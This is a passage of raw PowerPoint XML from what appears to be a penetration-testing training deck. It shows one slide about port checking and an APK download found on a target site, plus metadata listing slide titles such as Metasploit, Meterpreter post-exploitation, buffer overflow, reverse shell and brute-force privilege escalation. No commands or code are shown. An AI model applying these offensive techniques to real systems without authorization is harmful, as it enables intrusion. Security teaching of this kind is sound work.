                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> test to see available ports on the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The website didn't have anything to be scanned or enumerated but a single download button which downloads an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3B97DC-55C1-8A5A-05AF-8F174CC73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435" y="2158419"/>
            <a:ext cx="6092953" cy="3714384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11289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1681</TotalTime>
  <Words>2486</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>299</Paragraphs>
  <Slides>58</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__Inter_d65c78</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Bold</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Group Anonymous</vt:lpstr>
      <vt:lpstr>Mina Ghattas</vt:lpstr>
      <vt:lpstr>2 Rooms Pentesting Fundamentals and Principles of Security</vt:lpstr>
      <vt:lpstr>Mina Ghattas</vt:lpstr>
      <vt:lpstr>Passive Reconnaissance"</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2 Rooms : Protocols and Servers and Protocols and Servers 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Information Gathering (Reconnaissance)</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Analysis of Gathered Data (Vulnerability Identification)</vt:lpstr>
      <vt:lpstr>What are Vulnerabilities?</vt:lpstr>
      <vt:lpstr>Importance of Understanding Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerability Categories</vt:lpstr>
      <vt:lpstr>Vulnerability Scoring</vt:lpstr>
      <vt:lpstr>Introduction to Metasploit</vt:lpstr>
      <vt:lpstr>Introduction to Metasploit</vt:lpstr>
      <vt:lpstr>Key Concepts in Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Basics &amp; Scanning</vt:lpstr>
      <vt:lpstr>Meterpreter Overview &amp; Flavors</vt:lpstr>
      <vt:lpstr>Meterpreter Commands &amp; Post Exploitation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Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Immunity Debugger</vt:lpstr>
      <vt:lpstr>Mona</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mohamed Wael</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Banner Grabbing ( during enumeration )</vt:lpstr>
      <vt:lpstr>Reverse shell</vt:lpstr>
      <vt:lpstr>LinEnum</vt:lpstr>
      <vt:lpstr>PrivescCheck (Windows)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>privilege escalation by brute force</vt:lpstr>
      <vt:lpstr>At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dc:creator>
  <cp:lastModifiedBy>Mina</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-22T16:46:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T15:39:01Z</dcterms:modified>
</cp:coreProperties>
</file>